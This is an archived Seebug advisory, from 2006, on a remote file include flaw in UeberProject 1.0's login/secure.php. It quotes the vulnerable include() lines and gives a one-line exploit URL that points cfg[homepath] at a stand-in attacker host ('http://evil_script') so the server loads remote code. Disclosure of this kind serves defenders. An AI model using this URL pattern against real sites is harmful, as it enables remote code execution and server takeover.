ID SSV:5253
Type seebug
Reporter Root
Modified 2006-10-25T00:00:00
Description
No description provided by source.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Uber Project Document Management System (secure.php) Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Author: xoron
Tum islam aleminin Ramazan Bayrami Mubarek oLsun..!
Ne mutlu türküm diyene
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
CODE: in secure.php
line 12: $cfgRealProgDir = $cfg[homepath].$cfgProgDir2;
line 113: include($cfgRealProgDir . "lng/" . $languageFile);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
http://www.hedef.com/[script_path]/login/secure.php?cfg[homepath]=http://evil_script ?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx: str0ke, kacper, Preddy, Ironfist, Stansar, SHiKaA, Chaos, Nukedx, k1tk4t, x_w0x,OG
Tesekkurler: DJR, mdx, R3D4C!D, sakkure, ERNE:)
www.milw0rm.com
www.team-rootshell.com
www.cyber-warrior.org
irc.milw0rm.com #milw0rm
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
script down: http://www.meisel.cc/software/ueberp/ueberp-1.0.tar.bz2
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
{"href": "https://www.seebug.org/vuldb/ssvid-5253", "status": "poc", "bulletinFamily": "exploit", "modified": "2006-10-25T00:00:00", "title": "UeberProject <= 1.0 (login/secure.php) Remote File Include Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-5253", "cvelist": [], "description": "No description provided by source.", "viewCount": 2, "published": "2006-10-25T00:00:00", "sourceData": "\n -=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n\r\nUber Project Document Management System (secure.php) Remote File Include Vulnerability\r\n\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n\r\nAuthor: xoron\r\n\r\nTum islam aleminin Ramazan Bayrami Mubarek oLsun..!\r\n\r\nNe mutlu t\u00fcrk\u00fcm diyene\r\n\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n\r\nCODE: in secure.php\r\n\r\nline 12: $cfgRealProgDir = $cfg[homepath].$cfgProgDir2;\r\n\r\nline 113: include($cfgRealProgDir . "lng/" . $languageFile);\r\n\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n\r\nExploit:\r\n\r\nhttp://www.hedef.com/[script_path]/login/secure.php?cfg[homepath]=http://evil_script ?\r\n\r\n\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n\r\nThanx: str0ke, kacper, Preddy, Ironfist, Stansar, SHiKaA, Chaos, Nukedx, k1tk4t, x_w0x,OG\r\n\r\nTesekkurler: DJR, mdx, R3D4C!D, sakkure, ERNE:)\r\n\r\nwww.milw0rm.com\r\nwww.team-rootshell.com\r\nwww.cyber-warrior.org\r\nirc.milw0rm.com #milw0rm\r\n\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n\r\nscript down: http://www.meisel.cc/software/ueberp/ueberp-1.0.tar.bz2\r\n\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n\r\n\n ", "id": "SSV:5253", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T22:25:25", "reporter": "Root", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2017-11-19T22:25:25", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T22:25:25", "rev": 2}, "vulnersScore": 0.1}, "references": []}
{}